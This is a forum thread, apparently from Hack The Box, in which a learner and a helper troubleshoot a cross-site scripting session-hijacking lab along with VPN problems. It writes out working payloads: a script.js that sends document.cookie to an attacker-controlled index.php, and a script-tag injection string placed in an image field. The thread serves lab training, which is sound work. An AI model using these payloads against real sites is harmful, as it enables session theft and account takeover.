HTB Backend Broken - Cross Site Scripting Session Hijacking - How to Work Around Broken Infrastructure?

I’ve been trying for hours now to get this very simple exercise done. Luckily, the VPN doesn’t work (after wasting a lot of time on trying to get it working properly), so I was able to just type everything directly into the PwnBox.

I’m able to get the script.js to download but after that, the site never reaches back out for index.php. After reading the forums, it seems that I’m not alone. Is there a way to get around this? Because the HTB infrastructure is broken, I think there’s got to be a different way than the obvious, simple solution.

Hey dude! Sorry that you have been having a rough go of it. Paste the XSS line you are injecting into the form so we can help you. Edit Paste the contents of your script.js too, that might be the issue.

On a separate note, what errors were you getting with the VPN?
-onthesauce

No problem. I used both of these along with the dynamically assigned IP:

document.location='http://IP/index.php?c='+document.cookie;
new Image().src='http://IP/index.php?c='+document.cookie;

These were both tried as the contents of script.js. I even put <script>...stuff...</script> tags around it just in case I was missing something.

Then the XSS payload in the image field was updated to ...imgurl="><script src=http://IP:8080/script.js></script>. The XSS was successful and reached back to the PHP server I instantiated to grab the script. After that, silence. There was never a call to hit index.php (which was also in the same local directory as script.js.)

The VPN is as unstable as a one-legged stool. It drops for no reason (even though it’s configured as a VPN Connection in Kali’s network configuration settings). When it does work, it’s a hope and prayer that I will actually be able to connect to the resources. Sometimes they just time out and I get no response; other times it takes an incredible amount of time to load a resource/page; other times it works speedily with no problems. Pentesting is difficult enough as it is - it’s incredibly frustrating to drain even more time and mental bandwidth constantly chasing my tail in order to get basic resources to function properly. I have tried both US1 and US2 for endpoints.

Thanks for reaching out.

Alright, so your script.js looks like it should be good, as long as one of those is in there with the right IP:PORT. And then just make sure the index.php file is created without changes from the code they supply.

The XSS payload can probably look more like just this though. Though it might be a spoiler if you didn’t try all the payloads.

"><script src=http://IP:8080/script.js></script>

Guessing that you already made sure you were using the right field to complete the challenge? As only one field actually works from what I have found.

On the VPN topic. You shouldn’t need to configure anything to get the VPN to work. The vpn profile should be downloaded as something like username.ovpn and then you should just open a cli and run(maybe as root or with sudo) openvpn username.ovpn

At least that’s all I have ever done when I have used it and it has worked fine for me.

Give that XSS another go and if it still doesn’t work post screenshots of your XSS payload and script.js.
-onthesauce

I have been noticing that the new pwnbox’s default to the /root directory, make sure that you are in the default home directory. That just got me when I started it up and did the challenge. Everything seems to be working fine on the backend though.